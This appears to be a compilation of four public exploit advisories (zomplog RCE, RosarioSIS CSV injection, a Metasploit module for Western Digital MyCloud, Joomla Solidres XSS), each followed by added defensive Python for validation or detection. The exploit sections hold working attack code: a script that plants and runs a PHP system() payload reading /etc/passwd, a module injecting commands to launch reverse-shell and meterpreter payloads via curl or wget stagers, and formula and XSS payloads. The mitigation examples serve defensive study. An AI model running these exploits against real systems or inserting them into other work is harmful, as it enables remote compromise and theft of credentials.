<pre><code>#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)<br />#Application: zomplog <br />#Version: v3.9<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: http://zomp.nl/zomplog/<br />#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip<br />#Date found: 22.07.2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br /><br />import sys<br />import requests<br /><br />#inputs<br />username=input('username: ')<br />password=input('password: ')<br /><br />#urls<br />login_url="http://localhost/zimplitcms/zimplit.php?action=login"<br />payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"<br />rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"<br />poc_url="http://localhost/zimplitcms/poc.php"<br /><br /><br />#login <br />session = requests.Session()<br />login_data=f"lang=en&username={username}&password={password}&submit=Start!"<br />headers={<br /> 'Cookie' : 'ZsessionLang=en',<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'<br /> }<br />login_req=session.post(login_url,headers=headers,data=login_data)<br /><br />if login_req.status_code == 200:<br /> print('Login OK')<br />else:<br /> print('Login problem.')<br /> sys.exit(1)<br />#payload<br />payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"<br />pheaders={<br /> 'Content-Type' : 'application/x-www-form-urlencoded',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'<br /> }<br 
/>payload_req=session.post(payload_url,headers=pheaders,data=payload_data)<br /><br />#rename<br /><br />rename_req=session.get(rename_url)<br /><br />#poc<br />poc_req=session.get(poc_url)<br />print(poc_req.text)<br /><br /><br />#youtube poc video - https://youtu.be/nn7hieGyCFs<br /> <br /><br /></code></pre>
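<p>The script above chains two authenticated actions: <code>saveE</code> writes attacker-controlled text into Zsettings.js, and <code>rename</code> turns that file into poc.php, which the web server then executes as code. The defensive fix belongs in the rename handler: a rename must never produce a server-executable file, escape the edit directory, or change the file's type. The Python below is an added illustration of such a policy, not zomplog's or Zimplit's own PHP code; the extension lists, the <code>validate_rename</code> and <code>is_rename_allowed</code> names and the rule that a rename preserves the file type are assumptions made for the example.</p>

```python
import posixpath

# Constructed policy lists for this illustration, not taken from the application.
# Any extension the web server hands to an interpreter must never result from a rename.
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar", ".phps"}
# File types an authenticated editor is allowed to write and rename.
EDITABLE_EXTENSIONS = {".js", ".css", ".html", ".txt"}


class RenameRejected(ValueError):
    """Raised when a rename request violates the policy."""


def _extensions(name: str) -> list:
    """Return every extension of a name in order, so 'x.php.js' yields ['.php', '.js'].
    Checking all of them matters on servers that select a handler by any extension."""
    parts = name.split(".")
    return ["." + p.lower() for p in parts[1:]] if len(parts) > 1 else []


def validate_rename(oldname: str, newname: str) -> str:
    """Return the validated new name, or raise RenameRejected.

    Policy (an assumption for this example):
      * both names are bare file names: no separators, no '..', no NUL, no dot-files
      * the source must be one of the editable, non-executable types
      * no extension anywhere in the new name may be server-executable
      * the rename must keep the file's type (last extension unchanged)
    """
    for name in (oldname, newname):
        if not name or name != posixpath.basename(name) or "\\" in name:
            raise RenameRejected(f"not a bare file name: {name!r}")
        if "\x00" in name or name.startswith("."):
            raise RenameRejected(f"illegal name: {name!r}")

    old_ext = _extensions(oldname)
    new_ext = _extensions(newname)
    if not old_ext or old_ext[-1] not in EDITABLE_EXTENSIONS:
        raise RenameRejected(f"source is not an editable type: {oldname!r}")
    if any(ext in EXECUTABLE_EXTENSIONS for ext in new_ext):
        raise RenameRejected(f"target would be server-executable: {newname!r}")
    if new_ext[-1:] != old_ext[-1:]:
        raise RenameRejected(f"rename must preserve the file type: {oldname!r} -> {newname!r}")
    return newname


def is_rename_allowed(oldname: str, newname: str) -> bool:
    """Boolean wrapper around validate_rename for callers that only need a decision."""
    try:
        validate_rename(oldname, newname)
    except RenameRejected:
        return False
    return True


if __name__ == "__main__":
    # The rename the script above requests, beside renames the policy permits or refuses.
    for old, new in [("Zsettings.js", "poc.php"), ("Zsettings.js", "Zsettings.bak.js"),
                     ("Zsettings.js", "poc.php.js"), ("Zsettings.js", "../poc.js")]:
        verdict = "allowed" if is_rename_allowed(old, new) else "rejected"
        print(f"{old} -> {new}: {verdict}")
```

<p>Checking every extension, not just the last, is what makes <code>poc.php.js</code> fail as well as <code>poc.php</code>; on servers that map handlers by any extension in the name, the intermediate <code>.php</code> would otherwise be enough.</p>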
<pre><code># Exploit Title: RosarioSIS 10.8.4 - CSV Injection<br /># Google Dork: NA<br /># Exploit Author: Ranjeet Jaiswal<br /># Vendor Homepage: https://www.rosariosis.org/<br /># Software Link: https://gitlab.com/francoisjacquet/rosariosis/-/archive/v10.8.4/rosariosis-v10.8.4.zip<br /># Affected Version: 10.8.4<br /># Category: WebApps<br /># Tested on: Windows 10<br /># <br />#<br /># 1. Vendor Description:<br />#<br /># RosarioSIS has been designed to address the most important needs of administrators, teachers, support staff, parents, students, and clerical personnel. However, it also adds many components not typically found in Student Information Systems. <br />#<br /># 2. Technical Description:<br />#<br /># A CSV Injection (also known as Formula Injection) vulnerability in RosarioSIS 10.8.4 allows a malicious user to store a formula payload that is evaluated when the exported CSV/XLS file is opened, redirecting an authorized user to a malicious website.<br /><br />#<br /># 3. Proof Of Concept:<br /><br /> 3.1. Proof of Concept for CSV injection.<br /><br /># Steps to reproduce:<br />Step 1: Log in to RosarioSIS 10.8.4.<br />Step 2: Go to the Periods page.<br />Step 3: Add a CSV injection redirection payload such as "=HYPERLINK("https://www.google.com","imp")" in the Title field.<br />Step 4: Click the Save button to save the data.<br />Step 5: Go to the Export tab and export the data.<br />Step 6: When a user opens the downloaded Periods.xls file, the redirection hyperlink is shown.<br />Step 7: When the user clicks the link, they are redirected to the attacker's or another malicious website.<br /><br /><br /><br /># 4. Solution:<br /> Upgrade to the latest release of RosarioSIS.<br /><br /></code></pre>
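<p>Step 3 above stores a formula in a free-text field and step 5 exports it unchanged, so the spreadsheet evaluates it on open. The standard mitigation is applied at export time: any cell that begins with a formula trigger gets a leading single quote (the spreadsheet's literal-text marker) and every cell is quoted so an embedded quote cannot end the cell early. The Python below is an added example, not RosarioSIS's code; the <code>looks_like_formula</code>, <code>neutralize_cell</code>, <code>export_rows</code> and <code>parse_export</code> names and the sample Periods rows are constructed for it.</p>

```python
import csv
import io

# Leading characters that spreadsheet applications interpret as the start of a formula.
# Tab and carriage return are included because a cell may begin with them and still be
# evaluated once pasted or imported.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def looks_like_formula(value) -> bool:
    """True when a string value would be evaluated as a formula by a spreadsheet.
    Usable at save time (the Title field in the steps above) to flag or refuse input."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def neutralize_cell(value) -> str:
    """Return the text to write for one exported cell.

    Numbers coming from the database are written as-is. Strings that start with a
    formula trigger get a leading single quote, which spreadsheets treat as a
    literal-text marker, so '=HYPERLINK(...)' is displayed rather than evaluated.
    """
    if value is None:
        return ""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    return "'" + text if looks_like_formula(text) else text


def export_rows(header, rows) -> str:
    """Serialize a header and rows as CSV with every cell neutralized and quoted.
    Quoting every field makes the csv module double any embedded quotes, so a value
    cannot close the cell early and start a new, unprefixed one."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow([neutralize_cell(h) for h in header])
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def parse_export(text: str) -> list:
    """Read exported CSV text back into rows, as a spreadsheet import would."""
    return list(csv.reader(io.StringIO(text)))


# Constructed sample export resembling the Periods data in the advisory: one benign
# title and one title carrying the advisory's HYPERLINK payload.
SAMPLE_HEADER = ["Title", "Sort Order"]
SAMPLE_ROWS = [
    ["Period 1", 1],
    ['=HYPERLINK("https://www.google.com","imp")', 2],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_HEADER, SAMPLE_ROWS))
```

<p>Only string columns are neutralized; numeric columns that come from the database keep their sign, so a stored value of -5 still exports as a number while a user-typed "-5" in a text field is made literal. Applying <code>looks_like_formula</code> at save time as well gives a second layer if another export path is added later.</p>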
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Western Digital MyCloud unauthenticated command injection',<br /> 'Description' => %q{<br /> This module exploits authentication bypass (CVE-2018-17153) and<br /> command injection (CVE-2016-10108) vulnerabilities in Western<br /> Digital MyCloud before 2.30.196 in order to achieve<br /> unauthenticated remote code execution as the root user.<br /><br /> The module first performs a check to see if the target is<br /> WD MyCloud. If so, it attempts to trigger an authentication<br /> bypass (CVE-2018-17153) via a crafted GET request to<br /> /cgi-bin/network_mgr.cgi. If the server responds as expected,<br /> the module assesses the vulnerability status by attempting to<br /> exploit a command injection vulnerability (CVE-2016-10108) in<br /> order to print a random string via the echo command. This is<br /> done via a crafted POST request to /web/google_analytics.php.<br /><br /> If the server is vulnerable, the same command injection vector<br /> is leveraged to execute the payload.<br /><br /> This module has been successfully tested against Western Digital<br /> MyCloud version 2.30.183.<br /><br /> Note: based on the available disclosures, it seems that the<br /> command injection vector (CVE-2016-10108) might be exploitable<br /> without the authentication bypass (CVE-2018-17153) on versions<br /> before 2.21.126. 
The obtained results on 2.30.183 imply that<br /> the patch for CVE-2016-10108 did not actually remove the command<br /> injection vector, but only prevented unauthenticated access to it.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Erik Wynter', # @wyntererik - Metasploit<br /> 'Steven Campbell', # CVE-2016-10108 disclosure and PoC<br /> 'Remco Vermeulen' # CVE-2018-17153 disclosure and PoC<br /> ],<br /> 'References' => [<br /> ['CVE', '2016-10108'], # command injection in /web/google_analytics.php via a modified arg parameter in the POST data.<br /> ['CVE', '2018-17153'], # authentication bypass<br /> ['URL', 'https://www.securify.nl/advisory/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/'], # CVE-2018-17153 disclosure and PoC<br /> ['URL', 'https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/'] # CVE-2016-10108 disclosure and PoC<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 443,<br /> 'SSL' => true<br /> },<br /> 'Platform' => %w[linux unix],<br /> 'Arch' => [ ARCH_ARMLE, ARCH_CMD ],<br /> 'Targets' => [<br /> [<br /> 'Unix In-Memory',<br /> {<br /> 'Platform' => [ 'unix', 'linux' ],<br /> 'Arch' => ARCH_CMD,<br /> 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },<br /> 'Type' => :unix_memory<br /> }<br /> ],<br /> [<br /> 'Linux Dropper', {<br /> 'Arch' => [ARCH_ARMLE],<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',<br /> 'CMDSTAGER::FLAVOR' => :curl<br /> },<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'CmdStagerFlavor' => ['curl', 'wget'],<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2016-12-14', # CVE-2016-10108 disclosure date<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],<br /> 'Reliability' 
=> [ REPEATABLE_SESSION ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'The base path to WD MyCloud', '/']),<br /> ])<br /> end<br /><br /> def check<br /> # sanity check to see if the target is likely WD MyCloud<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path)<br /> })<br /><br /> return CheckCode::Unknown('Connection failed.') unless res<br /><br /> return CheckCode::Safe('Target is not a WD MyCloud application.') unless res.code == 200 && res.body.include?('var MODEL_ID = "WDMyCloud')<br /><br /> print_status("#{rhost}:#{rport} - The target is WD MyCloud. Checking vulnerability status...")<br /> # try the authentication bypass (CVE-2018-17153)<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'network_mgr.cgi'),<br /> 'vars_get' => {<br /> 'cmd' => 'cgi_get_ipv6',<br /> 'flag' => 1 # this cannot be randomized according to the CVE-2018-17153 details<br /> }<br /> })<br /><br /> return CheckCode::Unknown('Connection failed while attempting to trigger the authentication bypass.') unless res<br /><br /> return CheckCode::Unknown("Received unexpected response code #{res.code} while attempting to trigger the authentication bypass.") unless res.code == 404<br /><br /> # send a command to print a random string via echo. 
if the target is vulnerable, both the command and the command output will be part of the response body<br /> echo_cmd = "echo #{Rex::Text.rand_text_alphanumeric(8..42)}"<br /> print_status("#{rhost}:#{rport} - Attempting to execute #{echo_cmd}...")<br /> res = execute_command(echo_cmd, { 'wait_for_response' => true })<br /><br /> return CheckCode::Unknown('Connection failed while trying to execute the echo command to check the vulnerability status.') unless res<br /><br /> return CheckCode::Vulnerable('The target executed the echo command.') if res.code == 200 && res.body.include?(echo_cmd) && res.body.include?('"success":true')<br /><br /> CheckCode::Safe('The target failed to execute the echo command.')<br /> end<br /><br /> def execute_command(cmd, opts = {})<br /> request_hash = {<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'web', 'google_analytics.php'),<br /> 'cookie' => 'username=admin',<br /> 'vars_post' => {<br /> 'cmd' => 'set',<br /> 'opt' => 'cloud-device-num',<br /> 'arg' => "0|echo `#{cmd}` #"<br /> }<br /> }<br /><br /> return send_request_cgi(request_hash) if opts['wait_for_response']<br /><br /> # if we are trying to execute the payload, we can just yeet it at the server and return without waiting for a response<br /> send_request_cgi(request_hash, 0)<br /> end<br /><br /> def exploit<br /> if target.arch.first == ARCH_CMD<br /> print_status("#{rhost}:#{rport} - Executing the payload. This may take a few seconds...")<br /> execute_command(payload.encoded)<br /> else<br /> execute_cmdstager(background: true)<br /> end<br /> end<br />end<br /></code></pre>
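<p>The module's <code>check</code> and <code>execute_command</code> methods spell out the two requests a defender can watch for: a GET to /cgi-bin/network_mgr.cgi with cmd=cgi_get_ipv6&amp;flag=1, followed by a POST to /web/google_analytics.php whose <code>arg</code> is not the plain number that cloud-device-num expects, sent with a <code>username=admin</code> cookie. The Python below is an added detection example, not part of the Metasploit module; the JSON record shape, the sample entries and the function names are constructed for it, and it assumes a reverse proxy or WAF that logs POST bodies.</p>

```python
import json
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample records, in the shape a reverse proxy or WAF with request-body
# logging might produce. They are not real device logs; the paths, parameters and
# cookie value are the ones the module above sends. The third record carries the
# module's injection shape with a harmless inner echo, as its own check method does.
SAMPLE_LOG = """\
{"ts": 100, "src": "10.0.0.5", "method": "GET", "uri": "/", "cookie": "", "body": ""}
{"ts": 101, "src": "10.0.0.5", "method": "GET", "uri": "/cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1", "cookie": "", "body": ""}
{"ts": 102, "src": "10.0.0.5", "method": "POST", "uri": "/web/google_analytics.php", "cookie": "username=admin", "body": "cmd=set&opt=cloud-device-num&arg=0%7Cecho+%60echo+check%60+%23"}
{"ts": 200, "src": "10.0.0.9", "method": "POST", "uri": "/web/google_analytics.php", "cookie": "PHPSESSID=c0ffee", "body": "cmd=set&opt=cloud-device-num&arg=1"}
"""

# Characters that let a value escape a shell command line; cloud-device-num is numeric.
SHELL_META = re.compile(r"[|;&`$<>\n\r]")
NUMERIC = re.compile(r"\d+")


def is_auth_bypass_probe(rec: dict) -> bool:
    """GET /cgi-bin/network_mgr.cgi?cmd=cgi_get_ipv6&flag=1, the CVE-2018-17153 trigger
    the module's check method sends."""
    parts = urlsplit(rec["uri"])
    if rec["method"] != "GET" or parts.path != "/cgi-bin/network_mgr.cgi":
        return False
    query = parse_qs(parts.query)
    return query.get("cmd") == ["cgi_get_ipv6"] and query.get("flag") == ["1"]


def is_command_injection(rec: dict) -> bool:
    """POST /web/google_analytics.php whose 'arg' is not a plain number and carries
    shell metacharacters (the module sends "0|echo `...` #")."""
    parts = urlsplit(rec["uri"])
    if rec["method"] != "POST" or parts.path != "/web/google_analytics.php":
        return False
    body = parse_qs(rec["body"], keep_blank_values=True)
    arg = body.get("arg", [""])[0]
    return NUMERIC.fullmatch(arg) is None and SHELL_META.search(arg) is not None


def has_forged_admin_cookie(rec: dict) -> bool:
    """The module presents 'username=admin' as a cookie; treat it as an indicator here."""
    return "username=admin" in rec["cookie"]


def find_attack_chains(log_text: str, window: int = 300) -> list:
    """Correlate per source address: each injection attempt is reported together with
    whether a bypass probe from the same source preceded it within `window` seconds."""
    records = [json.loads(line) for line in log_text.splitlines() if line.strip()]
    probes = defaultdict(list)
    findings = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        if is_auth_bypass_probe(rec):
            probes[rec["src"]].append(rec["ts"])
        elif is_command_injection(rec):
            preceded = any(0 <= rec["ts"] - t <= window for t in probes[rec["src"]])
            findings.append({
                "src": rec["src"],
                "ts": rec["ts"],
                "bypass_probe_seen": preceded,
                "forged_admin_cookie": has_forged_admin_cookie(rec),
            })
    return findings


if __name__ == "__main__":
    for finding in find_attack_chains(SAMPLE_LOG):
        print(finding)
```

<p>The injection test is deliberately shape-based (non-numeric plus a shell metacharacter) rather than a match on the module's exact string, since the same vector can be reached with other command text; the bypass probe, by contrast, is matched exactly because the module notes that <code>flag=1</code> cannot be varied.</p>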
<pre><code># Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS<br /># Exploit Author: CraCkEr<br /># Date: 28/07/2023<br /># Vendor: Solidres Team<br /># Vendor Homepage: http://solidres.com/<br /># Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/<br /># Demo: http://demo.solidres.com/joomla<br /># Tested on: Windows 10 Pro<br /># Impact: Manipulate the content of the site <br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka <br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />An attacker can send the victim a link containing a malicious URL in an email or instant message and,<br />once the victim opens it, perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />GET parameter 'show' is vulnerable to XSS<br />GET parameter 'reviews' is vulnerable to XSS<br />GET parameter 'type_id' is vulnerable to XSS<br />GET parameter 'distance' is vulnerable to XSS<br />GET parameter 'facilities' is vulnerable to XSS<br />GET parameter 'categories' is vulnerable to XSS<br />GET parameter 'prices' is vulnerable to XSS<br />GET parameter 'location' is vulnerable to XSS<br />GET parameter 'Itemid' is vulnerable to XSS<br /><br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]<br /><br 
/>https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11<br /><br />https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14<br /><br /><br /><br />[-] Done<br /></code></pre>
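<p>Every parameter listed above is reflected into the page without validation or encoding. The usual fix has two parts: accept only the shape each parameter is expected to have, and HTML-encode whatever free text is still reflected. The Python below is an added example, not Solidres's or Joomla's code; the per-parameter rules are inferred from the benign values in the sample URLs and are assumptions, as are the <code>validate_query</code> and <code>render_value</code> names.</p>

```python
import re
from html import escape
from urllib.parse import parse_qs, urlsplit

# Allowed shape per parameter. These rules are an assumption inferred from the benign
# values in the advisory's sample URLs (type_id=0, distance=0-11, Itemid=306,
# checkin=27-07-2023, location=italy); they are not Solidres's own validation.
INT = re.compile(r"\d{1,9}")
RANGE = re.compile(r"\d{1,6}-\d{1,6}")
DATE = re.compile(r"\d{2}-\d{2}-\d{4}")
TEXT = re.compile(r"[A-Za-z0-9 .,'\-]{1,64}")

PARAM_RULES = {
    "show": INT, "reviews": INT, "type_id": INT, "facilities": INT,
    "categories": INT, "Itemid": INT,
    "distance": RANGE, "prices": RANGE,
    "checkin": DATE, "checkout": DATE,
    "location": TEXT,
    "task": re.compile(r"hub\.(search|updateFilter)"),
    "ordering": re.compile(r"score|distance"),
    "direction": re.compile(r"asc|desc"),
    "option": re.compile(r"com_solidres"),
}


def validate_query(url: str):
    """Split a request URL's query string into accepted and rejected parameters.

    Unknown parameters are rejected, values that do not fully match their rule are
    rejected with a reason, and accepted integers are converted to int so they can
    never carry markup into a template. Only the first value of a repeated name is used.
    """
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    accepted, rejected = {}, {}
    for name, values in query.items():
        rule = PARAM_RULES.get(name)
        if rule is None:
            rejected[name] = "unknown parameter"
            continue
        value = values[0]
        if not rule.fullmatch(value):
            rejected[name] = "value does not match allowed shape"
            continue
        accepted[name] = int(value) if rule is INT else value
    return accepted, rejected


def render_value(value) -> str:
    """Encode a value for insertion into HTML text or a double-quoted attribute.
    Applied to every accepted free-text value (location) at output time."""
    return escape(str(value), quote=True)


if __name__ == "__main__":
    # The advisory's first sample URL, with its [XSS] placeholder left in place.
    sample = ("https://website/joomla/greenery_hub/index.php/en/hotels/reservations"
              "?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]")
    ok, bad = validate_query(sample)
    print("accepted:", ok)
    print("rejected:", bad)
    print("location as HTML:", render_value(ok["location"]))
```

<p>The 32-hex-character parameter carried by several of the sample URLs is rejected here as unknown; it is presumably a per-session form token, and a real filter would validate it separately rather than drop it. The point of the example is the division of labour: strict shapes for everything that has one, and encoding for the one free-text field that does not.</p>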